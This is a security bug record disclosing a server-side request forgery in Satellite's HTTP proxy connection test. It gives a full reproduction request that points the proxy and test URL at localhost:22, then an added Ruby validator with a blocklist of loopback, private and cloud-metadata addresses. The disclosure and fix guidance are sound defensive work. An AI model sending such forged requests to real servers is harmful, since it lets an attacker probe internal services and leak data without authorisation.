Bug 2333494

Summary: http proxies: Satellite: Service side request forgery in http proxies
Product: [Other] Security Response
Reporter: OSIDB Bzimport <bzimport>
Component: vulnerability
Assignee: Product Security DevOps Team <prodsec-dev>
Status: NEW ---
QA Contact:
Severity: medium
Docs Contact:
Priority: medium
Version: unspecified
CC: anthomas, ehelms, ggainey, hlawatschek, juwatts, mhulan, nmoumoul, osousa, pcreech, rchan, smallamp
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version:
Doc Type: ---
Doc Text:
A server-side request forgery exists in Satellite. When a PUT HTTP request is made to /http_proxies/test_connection with the http_proxies variable set to localhost, the attacker can fetch the localhost banner.
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:

Description OSIDB Bzimport 2024-12-20 12:24:51 UTC
ssrf in https://vulnerableserver.com/http_proxies/test_connection
Affected parameters:
http_proxy[url]
test_url

• Fill the values and Capture the request with BurpSuite
• In the Repeater tab change the parameter values http_proxy[url] and/or test_url for: http://localhost:22
By default the SSH (22) port is not open:
HTTP Request:
PUT /http_proxies/test_connection HTTP/2
Host: vulnerableserver.com
Cookie: timezone=Europe%2FAmsterdam; _session_id=70c6c0638ec6aad4bd733570fd807267
Content-Length: 381
Sec-Ch-Ua-Platform: "Windows"
X-Csrf-Token: DQmNtiYbhAdFABfamR7mZy7WhruFtY2jjAWrtRPGu5PqmaJwrsCB9Y7hqQZmsCaqNv1VN2aDsxeBBSsgpA478g
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://vulnerableserver.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerableserver.com/http_proxies/new
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
authenticity_token=DQmNtiYbhAdFABfamR7mZy7WhruFtY2jjAWrtRPGu5PqmaJwrsCB9Y7hqQZmsCaqNv1VN2aDsxeBBSsgpA478g&http_proxy%5Bname%5D=test&http_proxy%5Burl%5D=http://localhost:22&http_proxy%5Busername%5D=&fakepassword=&http_proxy%5Bcacert%5D=&test_url=http://localhost:22&http_proxy%5Blocation_ids%5D%5B%5D=&http_proxy%5Borganization_ids%5D%5B%5D=&http_proxy%5Borganization_ids%5D%5B%5D=1
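A destination check of the kind that closes this class of bug, written here as an added example for this record; it is not code from Foreman, Satellite or the reporter, and the page does not state what the product's fix was. It takes the value a user submits as http_proxy[url] or test_url, extracts the host, and refuses loopback, link-local, private, multicast and IPv4-mapped destinations before any connection is made. The blocklist, the function names and the sample URLs (including the reporter's localhost:22 value and a constructed public TEST-NET-2 address) are this example's own assumptions.

```ruby
require 'uri'
require 'ipaddr'
require 'resolv'

# Destinations a proxy connectivity test must never be allowed to reach.
# This blocklist is the example's own policy (an assumption), not Foreman's.
BLOCKED_RANGES = %w[
  0.0.0.0/8 127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16
  169.254.0.0/16 100.64.0.0/10 224.0.0.0/4
  ::/128 ::1/128 fc00::/7 fe80::/10 ::ffff:0:0/96
].map { |cidr| IPAddr.new(cidr) }.freeze

# True when the literal IP address falls inside any blocked range.
# IPv4-mapped IPv6 literals (::ffff:127.0.0.1) are also checked as plain IPv4,
# so the mapped form cannot be used to get past the IPv4 entries.
def blocked_address?(ip_string)
  addr = IPAddr.new(ip_string)
  candidates = [addr]
  candidates << addr.native if addr.ipv6? && addr.ipv4_mapped?
  candidates.any? do |a|
    BLOCKED_RANGES.any? { |range| range.family == a.family && range.include?(a) }
  end
end

# Validates the URL a user submits as http_proxy[url] or test_url.
# Returns [allowed, reason]. Literal IPs are checked directly; other names are
# resolved with Resolv (/etc/hosts, then DNS) and every returned address must
# be allowed. "localhost" is refused without a lookup, and a name that does
# not resolve is refused too, so the check fails closed.
def safe_proxy_target?(url_string)
  uri = URI.parse(url_string)
  return [false, "unsupported scheme #{uri.scheme.inspect}"] unless %w[http https].include?(uri.scheme)

  host = uri.hostname.to_s.downcase # hostname strips the [] around IPv6 literals
  return [false, 'empty host'] if host.empty?
  return [false, 'localhost is not a valid proxy'] if host == 'localhost' || host.end_with?('.localhost')

  ips = if host.match?(Resolv::IPv4::Regex) || host.match?(Resolv::IPv6::Regex)
          [host]
        else
          Resolv.getaddresses(host)
        end
  return [false, 'host does not resolve'] if ips.empty?

  blocked = ips.find { |ip| blocked_address?(ip) }
  blocked ? [false, "#{host} resolves to blocked address #{blocked}"] : [true, 'ok']
rescue URI::InvalidURIError, IPAddr::InvalidAddressError => e
  [false, "invalid url: #{e.message}"]
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample inputs: the reporter's localhost:22 value, a few common
  # loopback/link-local spellings, and one public (TEST-NET-2) address that passes.
  %w[http://localhost:22 http://127.0.0.1:22 http://[::1]:22
     http://[::ffff:127.0.0.1]:8080 http://169.254.169.254/latest/
     http://198.51.100.7:3128].each do |url|
    allowed, reason = safe_proxy_target?(url)
    puts "#{allowed ? 'ALLOW' : 'DENY '} #{url} (#{reason})"
  end
end
```

Two design points matter in practice. First, a hostname that resolves to a public address when validated can resolve to loopback by the time the connectivity test actually connects (DNS rebinding), so the stronger pattern is to connect to the exact IP that passed the check rather than re-resolving the name. Second, the report shows that the endpoint returned the service banner to the caller; whatever the connectivity test reports back to the browser should be limited to success or failure, not the remote response body.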